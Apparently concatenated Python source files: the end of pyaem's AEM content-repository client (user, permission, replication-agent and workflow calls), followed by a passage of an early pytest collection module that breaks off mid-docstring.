result = res.PyAemResult(response)
result.success(message)
return result
def _handler_exist_or_error(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
if message_elem != None:
message = message_elem.contents[0]
exist_message = ('org.apache.jackrabbit.api.security.user.AuthorizableExistsException: ' +
'User or Group for \'{0}\' already exists'.format(group_name))
result = res.PyAemResult(response)
if message == exist_message:
result.warning('Group {0}/{1} already exists'.format(group_path.rstrip('/'), group_name))
else:
result.failure(message)
return result
params = {
'createGroup': '',
'authorizableId': group_name,
'profile/givenName': group_name,
'intermediatePath': group_path
}
_handlers = {
201: _handler_ok,
500: _handler_exist_or_error
}
method = 'post'
url = '{0}/libs/granite/security/post/authorizables'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def change_password(self, user_path, user_name, old_password, new_password, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0}/{1} password changed'.format(user_path.rstrip('/'), user_name)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
':currentPassword': old_password,
'rep:password': new_password
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/{1}/{2}.rw.html'.format(self.url, user_path.strip('/'), user_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def set_permission(self, user_or_group_name, path, permissions, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Permissions {0} set on path {1} for user/group {2}'.format(permissions, path, user_or_group_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
message = message_elem.contents[0]
result = res.PyAemResult(response)
result.failure(message)
return result
params = {
'authorizableId': user_or_group_name,
'changelog': 'path:{0},{1}'.format(path, permissions)
}
_handlers = {
200: _handler_ok,
404: _handler_not_found
}
method = 'post'
url = '{0}/.cqactions.html'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def create_agent(self, agent_name, agent_type, dest_username, dest_password, dest_url, run_mode, **kwargs):
def _handler_ok_created(response, **kwargs):
message = '{0} agent {1} created'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_ok_updated(response, **kwargs):
message = '{0} agent {1} updated'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
if agent_type == 'flush':
params = {
'jcr:content/cq:name': 'flush',
'jcr:content/protocolHTTPHeaders': ['CQ-Action:{action}', 'CQ-Handle:{path}', 'CQ-Path:{path}'],
'jcr:content/protocolHTTPHeaders@TypeHint': 'String[]',
'jcr:content/protocolHTTPMethod': 'GET',
'jcr:content/serializationType': 'flush',
'jcr:content/noVersioning': 'true',
'jcr:content/jcr:mixinTypes': 'cq:ReplicationStatus',
'jcr:content/triggerReceive': 'true',
'jcr:content/triggerSpecific': 'true',
'jcr:content/transportUri': '{0}/dispatcher/invalidate.cache'.format(dest_url.rstrip('/'))
}
else:
params = {
'jcr:content/serializationType': 'durbo',
'jcr:content/transportUri': '{0}/bin/receive?sling:authRequestLogin=1'.format(dest_url.rstrip('/'))
}
params['jcr:primaryType'] = 'cq:Page'
params['jcr:content/sling:resourceType'] = '/libs/cq/replication/components/agent'
params['jcr:content/cq:template'] = '/libs/cq/replication/templates/agent'
params['jcr:content/enabled'] = 'true'
if dest_username != None:
params['jcr:content/transportUser'] = dest_username
if dest_password != None:
params['jcr:content/transportPassword'] = dest_password
_handlers = {
200: _handler_ok_updated,
201: _handler_ok_created
}
method = 'post'
url = '{0}/etc/replication/agents.{1}/{2}'.format(self.url, run_mode, agent_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def delete_agent(self, agent_name, run_mode, **kwargs):
def _handler_ok(response, **kwargs):
message = '{0} agent {1} deleted'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = '{0} agent {1} not found'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.warning(message)
return result
params = {
}
_handlers = {
204: _handler_ok,
404: _handler_not_found
}
method = 'delete'
url = '{0}/etc/replication/agents.{1}/{2}'.format(self.url, run_mode, agent_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def set_property(self, path, property_name, property_value, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Set property {0}={1} on path {2}'.format(property_name, property_value, path)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
property_name: property_value
}
_handlers = {
200: _handler_ok,
201: _handler_ok
}
method = 'post'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def enable_workflow(self, workflow, glob, edit, node_type, run_mode, **kwargs):
return self._set_workflow(workflow, glob, edit, True, node_type, run_mode, **kwargs)
def disable_workflow(self, workflow, glob, edit, node_type, run_mode, **kwargs):
return self._set_workflow(workflow, glob, edit, False, node_type, run_mode, **kwargs)
def _does_node_exist(self, node_path, node_desc, **kwargs):
def _handler_ok(response, **kwargs):
message = '{0} {1} exists'.format(node_desc, node_path)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = '{0} {1} does not exist'.format(node_desc, node_path)
result = res.PyAemResult(response)
result.failure(message)
return result
_handlers = {
200: _handler_ok,
404: _handler_not_found
}
method = 'get'
url = '{0}/{1}'.format(self.url, node_path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def _set_workflow(self, workflow, glob, edit, is_enabled, node_type, run_mode, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Workflow {0} {1}'.format(workflow, 'enabled' if is_enabled == True else 'disabled')
result = res.PyAemResult(response)
result.success(message)
return result
params = {
':status': 'browser',
'_charset_': 'utf-8',
'condition': kwargs.get('condition', ''),
'description': kwargs.get('description', ''),
'edit': edit,
'enabled': 'true' if is_enabled == True else 'false',
'eventType': '16',
'excludeList': kwargs.get('excludeList', ''),
'glob': glob,
'nodetype': node_type,
'runModes': run_mode,
'workflow': workflow
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/libs/cq/workflow/launcher'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def get_cluster_list(self, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Cluster list retrieved'
result = res.PyAemResult(response)
result.success(message)
return result
_handlers = {
200: _handler_ok
}
method = 'get'
url = '{0}/libs/granite/cluster/content/admin/cluster.list.json'.format(self.url)
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
|
{
"content_hash": "4a44e3728f6835db4a038f2062d1cd20",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 120,
"avg_line_length": 32.592592592592595,
"alnum_prop": 0.5505681818181818,
"repo_name": "Sensis/pyaem",
"id": "704befe14749e8da46ea9d3b0c9ef0269c6c5b41",
"size": "17600",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyaem/contentrepo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "143605"
}
],
"symlink_target": ""
}
|
""" Python test discovery, setup and run of test functions. """
import re
import fnmatch
import functools
import py
import inspect
import sys
import pytest
from _pytest.mark import MarkDecorator, MarkerError
from py._code.code import TerminalRepr
try:
import enum
except ImportError: # pragma: no cover
# Only available in Python 3.4+ or as a backport
enum = None
import _pytest
import pluggy
cutdir2 = py.path.local(_pytest.__file__).dirpath()
cutdir1 = py.path.local(pluggy.__file__.rstrip("oc"))
NoneType = type(None)
NOTSET = object()
isfunction = inspect.isfunction
isclass = inspect.isclass
callable = py.builtin.callable
# used to work around a python2 exception info leak
exc_clear = getattr(sys, 'exc_clear', lambda: None)
# The type of re.compile objects is not exposed in Python.
REGEX_TYPE = type(re.compile(''))
def filter_traceback(entry):
return entry.path != cutdir1 and not entry.path.relto(cutdir2)
def get_real_func(obj):
""" gets the real function object of the (possibly) wrapped object by
functools.wraps or functools.partial.
"""
while hasattr(obj, "__wrapped__"):
obj = obj.__wrapped__
if isinstance(obj, functools.partial):
obj = obj.func
return obj
def getfslineno(obj):
# xxx let decorators etc specify a sane ordering
obj = get_real_func(obj)
if hasattr(obj, 'place_as'):
obj = obj.place_as
fslineno = py.code.getfslineno(obj)
assert isinstance(fslineno[1], int), obj
return fslineno
def getimfunc(func):
try:
return func.__func__
except AttributeError:
try:
return func.im_func
except AttributeError:
return func
def safe_getattr(object, name, default):
""" Like getattr but return default upon any Exception.
Attribute access can potentially fail for 'evil' Python objects.
See issue214
"""
try:
return getattr(object, name, default)
except Exception:
return default
class FixtureFunctionMarker:
def __init__(self, scope, params,
autouse=False, yieldctx=False, ids=None):
self.scope = scope
self.params = params
self.autouse = autouse
self.yieldctx = yieldctx
self.ids = ids
def __call__(self, function):
if isclass(function):
raise ValueError(
"class fixtures not supported (may be in the future)")
function._pytestfixturefunction = self
return function
def fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a fixture factory function.
This decorator can be used (with or or without parameters) to define
a fixture function. The name of the fixture function can later be
referenced to cause its invocation ahead of running tests: test
modules or classes can use the pytest.mark.usefixtures(fixturename)
marker. Test functions can directly use fixture names as input
arguments in which case the fixture instance returned from the fixture
function will be injected.
:arg scope: the scope for which this fixture is shared, one of
"function" (default), "class", "module", "session".
:arg params: an optional list of parameters which will cause multiple
invocations of the fixture function and all of the tests
using it.
:arg autouse: if True, the fixture func is activated for all tests that
can see it. If False (the default) then an explicit
reference is needed to activate the fixture.
:arg ids: list of string ids each corresponding to the params
so that they are part of the test id. If no ids are provided
they will be generated automatically from the params.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse)(scope)
if params is not None and not isinstance(params, (list, tuple)):
params = list(params)
return FixtureFunctionMarker(scope, params, autouse, ids=ids)
def yield_fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a yield-fixture factory function
(EXPERIMENTAL).
This takes the same arguments as :py:func:`pytest.fixture` but
expects a fixture function to use a ``yield`` instead of a ``return``
statement to provide a fixture. See
http://pytest.org/en/latest/yieldfixture.html for more info.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse, yieldctx=True)(scope)
else:
return FixtureFunctionMarker(scope, params, autouse,
yieldctx=True, ids=ids)
defaultfuncargprefixmarker = fixture()
def pyobj_property(name):
def get(self):
node = self.getparent(getattr(pytest, name))
if node is not None:
return node.obj
doc = "python %s object this node was collected from (can be None)." % (
name.lower(),)
return property(get, None, None, doc)
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--fixtures', '--funcargs',
action="store_true", dest="showfixtures", default=False,
help="show available fixtures, sorted by plugin appearance")
parser.addini("usefixtures", type="args", default=[],
help="list of default fixtures to be used with this project")
parser.addini("python_files", type="args",
default=['test_*.py', '*_test.py'],
help="glob-style file patterns for Python test module discovery")
parser.addini("python_classes", type="args", default=["Test",],
help="prefixes or glob names for Python test class discovery")
parser.addini("python_functions", type="args", default=["test",],
help="prefixes or glob names for Python test function and "
"method discovery")
def pytest_cmdline_main(config):
if config.option.showfixtures:
showfixtures(config)
return 0
def pytest_generate_tests(metafunc):
# those alternative spellings are common - raise a specific error to alert
# the user
alt_spellings = ['parameterize', 'parametrise', 'parameterise']
for attr in alt_spellings:
if hasattr(metafunc.function, attr):
msg = "{0} has '{1}', spelling should be 'parametrize'"
raise MarkerError(msg.format(metafunc.function.__name__, attr))
try:
markers = metafunc.function.parametrize
except AttributeError:
return
for marker in markers:
metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
config.addinivalue_line("markers",
"parametrize(argnames, argvalues): call a test function multiple "
"times passing in different arguments in turn. argvalues generally "
"needs to be a list of values if argnames specifies only one name "
"or a list of tuples of values if argnames specifies multiple names. "
"Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
"decorated test function, one with arg1=1 and another with arg1=2."
"see http://pytest.org/latest/parametrize.html for more info and "
"examples."
)
config.addinivalue_line("markers",
"usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
"all of the specified fixtures. see http://pytest.org/latest/fixture.html#usefixtures "
)
def pytest_sessionstart(session):
session._fixturemanager = FixtureManager(session)
@pytest.hookimpl(trylast=True)
def pytest_namespace():
raises.Exception = pytest.fail.Exception
return {
'fixture': fixture,
'yield_fixture': yield_fixture,
'raises' : raises,
'collect': {
'Module': Module, 'Class': Class, 'Instance': Instance,
'Function': Function, 'Generator': Generator,
'_fillfuncargs': fillfixtures}
}
@fixture(scope="session")
def pytestconfig(request):
""" the pytest config object with access to command line opts."""
return request.config
@pytest.hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
testfunction = pyfuncitem.obj
if pyfuncitem._isyieldedfunction():
testfunction(*pyfuncitem._args)
else:
funcargs = pyfuncitem.funcargs
testargs = {}
for arg in pyfuncitem._fixtureinfo.argnames:
testargs[arg] = funcargs[arg]
testfunction(**testargs)
return True
def pytest_collect_file(path, parent):
ext = path.ext
if ext == ".py":
if not parent.session.isinitpath(path):
for pat in parent.config.getini('python_files'):
if path.fnmatch(pat):
break
else:
return
ihook = parent.session.gethookproxy(path)
return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def pytest_pycollect_makemodule(path, parent):
return Module(path, parent)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
outcome = yield
res = outcome.get_result()
if res is not None:
raise StopIteration
# nothing was collected elsewhere, let's do it here
if isclass(obj):
if collector.istestclass(obj, name):
Class = collector._getcustomclass("Class")
outcome.force_result(Class(name, parent=collector))
elif collector.istestfunction(obj, name):
# mock seems to store unbound methods (issue473), normalize it
obj = getattr(obj, "__func__", obj)
if not isfunction(obj):
collector.warn(code="C2", message=
"cannot collect %r because it is not a function."
% name, )
if getattr(obj, "__test__", True):
if is_generator(obj):
res = Generator(name, parent=collector)
else:
res = list(collector._genfunctions(name, obj))
outcome.force_result(res)
def is_generator(func):
try:
return py.code.getrawcode(func).co_flags & 32 # generator function
except AttributeError: # builtin functions have no bytecode
# assume them to not be generators
return False
class PyobjContext(object):
module = pyobj_property("Module")
cls = pyobj_property("Class")
instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
def obj():
def fget(self):
try:
return self._obj
except AttributeError:
self._obj = obj = self._getobj()
return obj
def fset(self, value):
self._obj = value
return property(fget, fset, None, "underlying python object")
obj = obj()
def _getobj(self):
return getattr(self.parent.obj, self.name)
def getmodpath(self, stopatmodule=True, includemodule=False):
""" return python path relative to the containing module. """
chain = self.listchain()
chain.reverse()
parts = []
for node in chain:
if isinstance(node, Instance):
continue
name = node.name
if isinstance(node, Module):
assert name.endswith(".py")
name = name[:-3]
if stopatmodule:
if includemodule:
parts.append(name)
break
parts.append(name)
parts.reverse()
s = ".".join(parts)
return s.replace(".[", "[")
def _getfslineno(self):
return getfslineno(self.obj)
def reportinfo(self):
# XXX caching?
obj = self.obj
if hasattr(obj, 'compat_co_firstlineno'):
# nose compatibility
fspath = sys.modules[obj.__module__].__file__
if fspath.endswith(".pyc"):
fspath = fspath[:-1]
lineno = obj.compat_co_firstlineno
else:
fspath, lineno = getfslineno(obj)
modpath = self.getmodpath()
assert isinstance(lineno, int)
return fspath, lineno, modpath
class PyCollector(PyobjMixin, pytest.Collector):
def funcnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_functions', name)
def isnosetest(self, obj):
""" Look for the __test__ attribute, which is applied by the
@nose.tools.istest decorator
"""
return safe_getattr(obj, '__test__', False)
def classnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_classes', name)
def istestfunction(self, obj, name):
return (
(self.funcnamefilter(name) or self.isnosetest(obj))
and safe_getattr(obj, "__call__", False) and getfixturemarker(obj) is None
)
def istestclass(self, obj, name):
return self.classnamefilter(name) or self.isnosetest(obj)
def _matches_prefix_or_glob_option(self, option_name, name):
"""
checks if the given name matches the prefix or glob-pattern defined
in ini configuration.
"""
for option in self.config.getini(option_name):
if name.startswith(option):
return True
# check that name looks like a glob-string before calling fnmatch
# because this is called for every name in each collected module,
# and fnmatch is somewhat expensive to call
elif ('*' in option or '?' in option or '[' in option) and \
fnmatch.fnmatch(name, option):
return True
return False
def collect(self):
if not getattr(self.obj, "__test__", True):
return []
# NB. we avoid random getattrs and peek in the __dict__ instead
# (XXX originally introduced from a PyPy need, still true?)
dicts = [getattr(self.obj, '__dict__', {})]
for basecls in inspect.getmro(self.obj.__class__):
dicts.append(basecls.__dict__)
seen = {}
l = []
for dic in dicts:
for name, obj in dic.items():
if name in seen:
continue
seen[name] = True
res = self.makeitem(name, obj)
if res is None:
continue
if not isinstance(res, list):
res = [res]
l.extend(res)
l.sort(key=lambda item: item.reportinfo()[:2])
return l
def makeitem(self, name, obj):
#assert self.ihook.fspath == self.fspath, self
return self.ihook.pytest_pycollect_makeitem(
collector=self, name=name, obj=obj)
def _genfunctions(self, name, funcobj):
module = self.getparent(Module).obj
clscol = self.getparent(Class)
cls = clscol and clscol.obj or None
transfer_markers(funcobj, cls, module)
fm = self.session._fixturemanager
fixtureinfo = fm.getfixtureinfo(self, funcobj, cls)
metafunc = Metafunc(funcobj, fixtureinfo, self.config,
cls=cls, module=module)
methods = []
if hasattr(module, "pytest_generate_tests"):
methods.append(module.pytest_generate_tests)
if hasattr(cls, "pytest_generate_tests"):
methods.append(cls().pytest_generate_tests)
if methods:
self.ihook.pytest_generate_tests.call_extra(methods,
dict(metafunc=metafunc))
else:
self.ihook.pytest_generate_tests(metafunc=metafunc)
Function = self._getcustomclass("Function")
if not metafunc._calls:
yield Function(name, parent=self, fixtureinfo=fixtureinfo)
else:
# add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
add_funcarg_pseudo_fixture_def(self, metafunc, fm)
for callspec in metafunc._calls:
subname = "%s[%s]" %(name, callspec.id)
yield Function(name=subname, parent=self,
callspec=callspec, callobj=funcobj,
fixtureinfo=fixtureinfo,
keywords={callspec.id:True})
def add_funcarg_pseudo_fixture_def(collector, metafunc, fixturemanager):
# this function will transform all collected calls to a functions
# if they use direct funcargs (i.e. direct parametrization)
# because we want later test execution to be able to rely on
# an existing FixtureDef structure for all arguments.
# XXX we can probably avoid this algorithm if we modify CallSpec2
# to directly care for creating the fixturedefs within its methods.
if not metafunc._calls[0].funcargs:
return # this function call does not have direct parametrization
# collect funcargs of all callspecs into a list of values
arg2params = {}
arg2scope = {}
for callspec in metafunc._calls:
for argname, argvalue in callspec.funcargs.items():
assert argname not in callspec.params
callspec.params[argname] = argvalue
arg2params_list = arg2params.setdefault(argname, [])
callspec.indices[argname] = len(arg2params_list)
arg2params_list.append(argvalue)
if argname not in arg2scope:
scopenum = callspec._arg2scopenum.get(argname,
scopenum_function)
arg2scope[argname] = scopes[scopenum]
callspec.funcargs.clear()
# register artificial FixtureDef's so that later at test execution
# time we can rely on a proper FixtureDef to exist for fixture setup.
arg2fixturedefs = metafunc._arg2fixturedefs
for argname, valuelist in arg2params.items():
# if we have a scope that is higher than function we need
# to make sure we only ever create an according fixturedef on
# a per-scope basis. We thus store and cache the fixturedef on the
# node related to the scope.
scope = arg2scope[argname]
node = None
if scope != "function":
node = get_scope_node(collector, scope)
if node is None:
assert scope == "class" and isinstance(collector, Module)
# use module-level collector for class-scope (for now)
node = collector
if node and argname in node._name2pseudofixturedef:
arg2fixturedefs[argname] = [node._name2pseudofixturedef[argname]]
else:
fixturedef = FixtureDef(fixturemanager, '', argname,
get_direct_param_fixture_func,
arg2scope[argname],
valuelist, False, False)
arg2fixturedefs[argname] = [fixturedef]
if node is not None:
node._name2pseudofixturedef[argname] = fixturedef
def get_direct_param_fixture_func(request):
return request.param
class FuncFixtureInfo:
def __init__(self, argnames, names_closure, name2fixturedefs):
self.argnames = argnames
self.names_closure = names_closure
self.name2fixturedefs = name2fixturedefs
def _marked(func, mark):
""" Returns True if :func: is already marked with :mark:, False otherwise.
This can happen if marker is applied to class and the test file is
invoked more than once.
"""
try:
func_mark = getattr(func, mark.name)
except AttributeError:
return False
return mark.args == func_mark.args and mark.kwargs == func_mark.kwargs
def transfer_markers(funcobj, cls, mod):
# XXX this should rather be code in the mark plugin or the mark
# plugin should merge with the python plugin.
for holder in (cls, mod):
try:
pytestmark = holder.pytestmark
except AttributeError:
continue
if isinstance(pytestmark, list):
for mark in pytestmark:
if not _marked(funcobj, mark):
mark(funcobj)
else:
if not _marked(funcobj, pytestmark):
pytestmark(funcobj)
class Module(pytest.File, PyCollector):
""" Collector for test classes and functions. """
def _getobj(self):
return self._memoizedcall('_obj', self._importtestmodule)
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Module, self).collect()
def _importtestmodule(self):
# we assume we are only called once per module
try:
mod = self.fspath.pyimport(ensuresyspath="append")
except SyntaxError:
raise self.CollectError(
py.code.ExceptionInfo().getrepr(style="short"))
except self.fspath.ImportMismatchError:
e = sys.exc_info()[1]
raise self.CollectError(
"import file mismatch:\n"
"imported module %r has this __file__ attribute:\n"
" %s\n"
"which is not the same as the test file we want to collect:\n"
" %s\n"
"HINT: remove __pycache__ / .pyc files and/or use a "
"unique basename for your test file modules"
% e.args
)
#print "imported test module", mod
self.config.pluginmanager.consider_module(mod)
return mod
def setup(self):
setup_module = xunitsetup(self.obj, "setUpModule")
if setup_module is None:
setup_module = xunitsetup(self.obj, "setup_module")
if setup_module is not None:
#XXX: nose compat hack, move to nose plugin
# if it takes a positional arg, its probably a pytest style one
# so we pass the current module object
if inspect.getargspec(setup_module)[0]:
setup_module(self.obj)
else:
setup_module()
fin = getattr(self.obj, 'tearDownModule', None)
if fin is None:
fin = getattr(self.obj, 'teardown_module', None)
if fin is not None:
#XXX: nose compat hack, move to nose plugin
# if it takes a positional arg, it's probably a pytest style one
# so we pass the current module object
if inspect.getargspec(fin)[0]:
finalizer = lambda: fin(self.obj)
else:
finalizer = fin
self.addfinalizer(finalizer)
class Class(PyCollector):
""" Collector for test methods. """
def collect(self):
if hasinit(self.obj):
self.warn("C1", "cannot collect test class %r because it has a "
"__init__ constructor" % self.obj.__name__)
return []
return [self._getcustomclass("Instance")(name="()", parent=self)]
def setup(self):
setup_class = xunitsetup(self.obj, 'setup_class')
if setup_class is not None:
setup_class = getattr(setup_class, 'im_func', setup_class)
setup_class = getattr(setup_class, '__func__', setup_class)
setup_class(self.obj)
fin_class = getattr(self.obj, 'teardown_class', None)
if fin_class is not None:
fin_class = getattr(fin_class, 'im_func', fin_class)
fin_class = getattr(fin_class, '__func__', fin_class)
self.addfinalizer(lambda: fin_class(self.obj))
class Instance(PyCollector):
def _getobj(self):
obj = self.parent.obj()
return obj
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Instance, self).collect()
def newinstance(self):
self.obj = self._getobj()
return self.obj
class FunctionMixin(PyobjMixin):
""" mixin for the code common to Function and Generator.
"""
def setup(self):
""" perform setup for this test function. """
if hasattr(self, '_preservedparent'):
obj = self._preservedparent
elif isinstance(self.parent, Instance):
obj = self.parent.newinstance()
self.obj = self._getobj()
else:
obj = self.parent.obj
if inspect.ismethod(self.obj):
setup_name = 'setup_method'
teardown_name = 'teardown_method'
else:
setup_name = 'setup_function'
teardown_name = 'teardown_function'
setup_func_or_method = xunitsetup(obj, setup_name)
if setup_func_or_method is not None:
setup_func_or_method(self.obj)
fin = getattr(obj, teardown_name, None)
if fin is not None:
self.addfinalizer(lambda: fin(self.obj))
def _prunetraceback(self, excinfo):
if hasattr(self, '_obj') and not self.config.option.fulltrace:
code = py.code.Code(get_real_func(self.obj))
path, firstlineno = code.path, code.firstlineno
traceback = excinfo.traceback
ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
if ntraceback == traceback:
ntraceback = ntraceback.cut(path=path)
if ntraceback == traceback:
#ntraceback = ntraceback.cut(excludepath=cutdir2)
ntraceback = ntraceback.filter(filter_traceback)
if not ntraceback:
ntraceback = traceback
excinfo.traceback = ntraceback.filter()
# issue364: mark all but first and last frames to
# only show a single-line message for each frame
if self.config.option.tbstyle == "auto":
if len(excinfo.traceback) > 2:
for entry in excinfo.traceback[1:-1]:
entry.set_repr_style('short')
def _repr_failure_py(self, excinfo, style="long"):
if excinfo.errisinstance(pytest.fail.Exception):
if not excinfo.value.pytrace:
return str(excinfo.value)
return super(FunctionMixin, self)._repr_failure_py(excinfo,
style=style)
def repr_failure(self, excinfo, outerr=None):
assert outerr is None, "XXX outerr usage is deprecated"
style = self.config.option.tbstyle
if style == "auto":
style = "long"
return self._repr_failure_py(excinfo, style=style)
class Generator(FunctionMixin, PyCollector):
def collect(self):
# test generators are seen as collectors but they also
# invoke setup/teardown on popular request
# (induced by the common "test_*" naming shared with normal tests)
self.session._setupstate.prepare(self)
# see FunctionMixin.setup and test_setupstate_is_preserved_134
self._preservedparent = self.parent.obj
l = []
seen = {}
for i, x in enumerate(self.obj()):
name, call, args = self.getcallargs(x)
if not callable(call):
raise TypeError("%r yielded non callable test %r" %(self.obj, call,))
if name is None:
name = "[%d]" % i
else:
name = "['%s']" % name
if name in seen:
raise ValueError("%r generated tests with non-unique name %r" %(self, name))
seen[name] = True
l.append(self.Function(name, self, args=args, callobj=call))
return l
def getcallargs(self, obj):
if not isinstance(obj, (tuple, list)):
obj = (obj,)
# explict naming
if isinstance(obj[0], py.builtin._basestring):
name = obj[0]
obj = obj[1:]
else:
name = None
call, args = obj[0], obj[1:]
return name, call, args
def hasinit(obj):
init = getattr(obj, '__init__', None)
if init:
if init != object.__init__:
return True
def fillfixtures(function):
""" fill missing funcargs for a test function. """
try:
request = function._request
except AttributeError:
# XXX this special code path is only expected to execute
# with the oejskit plugin. It uses classes with funcargs
# and we thus have to work a bit to allow this.
fm = function.session._fixturemanager
fi = fm.getfixtureinfo(function.parent, function.obj, None)
function._fixtureinfo = fi
request = function._request = FixtureRequest(function)
request._fillfixtures()
# prune out funcargs for jstests
newfuncargs = {}
for name in fi.argnames:
newfuncargs[name] = function.funcargs[name]
function.funcargs = newfuncargs
else:
request._fillfixtures()
_notexists = object()
class CallSpec2(object):
def __init__(self, metafunc):
self.metafunc = metafunc
self.funcargs = {}
self._idlist = []
self.params = {}
self._globalid = _notexists
self._globalid_args = set()
self._globalparam = _notexists
self._arg2scopenum = {} # used for sorting parametrized resources
self.keywords = {}
self.indices = {}
def copy(self, metafunc):
cs = CallSpec2(self.metafunc)
cs.funcargs.update(self.funcargs)
cs.params.update(self.params)
cs.keywords.update(self.keywords)
cs.indices.update(self.indices)
cs._arg2scopenum.update(self._arg2scopenum)
cs._idlist = list(self._idlist)
cs._globalid = self._globalid
cs._globalid_args = self._globalid_args
cs._globalparam = self._globalparam
return cs
def _checkargnotcontained(self, arg):
if arg in self.params or arg in self.funcargs:
raise ValueError("duplicate %r" %(arg,))
def getparam(self, name):
try:
return self.params[name]
except KeyError:
if self._globalparam is _notexists:
raise ValueError(name)
return self._globalparam
@property
def id(self):
return "-".join(map(str, filter(None, self._idlist)))
def setmulti(self, valtype, argnames, valset, id, keywords, scopenum,
param_index):
for arg,val in zip(argnames, valset):
self._checkargnotcontained(arg)
getattr(self, valtype)[arg] = val
self.indices[arg] = param_index
self._arg2scopenum[arg] = scopenum
if val is _notexists:
self._emptyparamspecified = True
self._idlist.append(id)
self.keywords.update(keywords)
def setall(self, funcargs, id, param):
for x in funcargs:
self._checkargnotcontained(x)
self.funcargs.update(funcargs)
if id is not _notexists:
self._idlist.append(id)
if param is not _notexists:
assert self._globalparam is _notexists
self._globalparam = param
for arg in funcargs:
self._arg2scopenum[arg] = scopenum_function
class FuncargnamesCompatAttr:
""" helper class so that Metafunc, Function and FixtureRequest
don't need to each define the "funcargnames" compatibility attribute.
"""
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
return self.fixturenames
class Metafunc(FuncargnamesCompatAttr):
"""
Metafunc objects are passed to the ``pytest_generate_tests`` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
:ivar fixturenames: set of fixture names required by the test function
:ivar function: underlying python test function
:ivar cls: class object where the test function is defined in or ``None``.
:ivar module: the module object where the test function is defined in.
:ivar config: access to the :class:`_pytest.config.Config` object for the
test session.
:ivar funcargnames:
.. deprecated:: 2.3
Use ``fixturenames`` instead.
"""
def __init__(self, function, fixtureinfo, config, cls=None, module=None):
self.config = config
self.module = module
self.function = function
self.fixturenames = fixtureinfo.names_closure
self._arg2fixturedefs = fixtureinfo.name2fixturedefs
self.cls = cls
self._calls = []
self._ids = py.builtin.set()
def parametrize(self, argnames, argvalues, indirect=False, ids=None,
scope=None):
""" Add new invocations to the underlying test function using the list
of argvalues for the given argnames. Parametrization is performed
during the collection phase. If you need to setup expensive resources
see about setting indirect=True to do it rather at test setup time.
:arg argnames: a comma-separated string denoting one or more argument
names, or a list/tuple of argument strings.
